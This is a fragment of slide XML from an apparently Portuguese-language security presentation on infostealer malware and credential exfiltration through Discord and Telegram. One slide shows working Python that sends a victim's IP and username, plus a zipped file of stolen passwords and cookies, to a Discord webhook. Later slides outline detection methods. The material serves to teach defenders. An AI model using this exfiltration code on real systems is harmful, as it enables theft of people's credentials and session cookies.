            <a:ext cx="21404218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EXFILTRAÇÃO VIA DISCORD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7F34410-07AF-22EA-13D3-38548C37608C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="20576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CEE372-110F-6274-EAF6-91A73A17BAC5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1905237" y="3267974"/>
            <a:ext cx="21160035" cy="100027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00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>import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requests</a:t>
            </a:r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 err="1">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>import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json</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" sz="2800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p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 err="1">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>def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rgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>send_to_discord</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>webhook_url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>data_summary</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>file_path</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>None</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A2B6C1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    # Estrutura de "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="A2B6C1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Embed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A2B6C1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>" para deixar o log organizado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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> = {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    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>embeds</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[{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        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>title</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t> "⚡ Nova Vítima Infectada",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        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"color"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>15158332</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, # Vermelho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        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>fields</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: [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            {</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t> "IP"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>value</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050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data_summary</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>], </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>inline</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>": </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>True</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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            {</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t> "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Username</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t> "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>value</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050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data_summary</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>], </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>inline</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>": </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>True</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>}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        ]}]}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</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A2B6C1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    # Envia o JSON com o resumo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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>requests.post</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>webhook_url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>json</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p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>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    # Envia o arquivo zipado com as senhas/cookies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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>if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file_path</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: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    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>with</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> open(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>file_path</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>rb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>as f: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        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>requests.post</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>webhook_url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, files={</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'file'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: f})</a:t>
            </a:r>
          </a:p>
          <a:p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>
                <a:solidFill>
                  <a:srgbClr val="A2B6C1"/>
                </a:solidFill>
              </a:rPr>
              <a:t># URL Exemplo: https://discord.com/api/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="A2B6C1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>webhooks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A2B6C1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/123456789/ABCDEFG...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C4AB2E47-052E-8BB5-7E58-AFEB1965B223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3606210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963DB7-3629-7743-2B4D-C3A2DF3D2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11BC8A86-1366-7A63-2019-C7AF9D480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14C5CA8C-3EDA-3BF2-E328-2125D3C0E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3652500"/>
            <a:ext cx="24387048" cy="63500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="53" name="Text 0">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{32E46721-3627-55E6-ED9B-97AB47AA96A9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1715310" y="4820038"/>
            <a:ext cx="20956554" cy="520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pt-BR" sz="8000" kern="0" spc="150" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="ED145B">
                    <a:alpha val="100000"/>
                  </a:srgbClr>
                </a:solidFill>
                <a:latin typeface="Gotham HTF Medium" pitchFamily="34" charset="0"/>
                <a:ea typeface="Gotham HTF Medium" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Gotham HTF Medium" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>A FÁBRICA DE CREDENCIAIS: DO STEALER-AS-A-SERVICE À EXFILTRAÇÃO VIA TELEGRAM/DISCORD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18966658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AFEC00-DFFE-D210-978B-5AE042F6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7150F302-19AE-9BFB-F630-C6AE506D0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D8393C3-2B3E-5F22-3E33-11A08B01939F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1905238" y="1504950"/>
            <a:ext cx="21404218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EXFILTRAÇÃO VIA DISCORD - DETECÇÃO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C0E56EA-7EFE-C0BE-9414-2FC2E7B9B4E2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="20576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18EC2415-7534-2419-64AB-98FFA7BD3803}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2057638" y="4086030"/>
            <a:ext cx="10135950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pt-BR" sz="4800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A2B6C1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>MONITORAMENTO DE WEBHOOKS (*/API/WEBHOOKS/*)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USER-AGENT ANÔMALO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pt-BR" sz="4800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A2B6C1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>INSPEÇÃO DE CERTIFICADOS (SSL/TLS DECRYPTION)</a:t>
            </a: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6FE4573-E703-2924-1850-70F01FF4835D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12345989" y="4362061"/>
            <a:ext cx="11115868" cy="89562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00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SELECT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="3200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>timestamp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="3200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>process_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="3200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
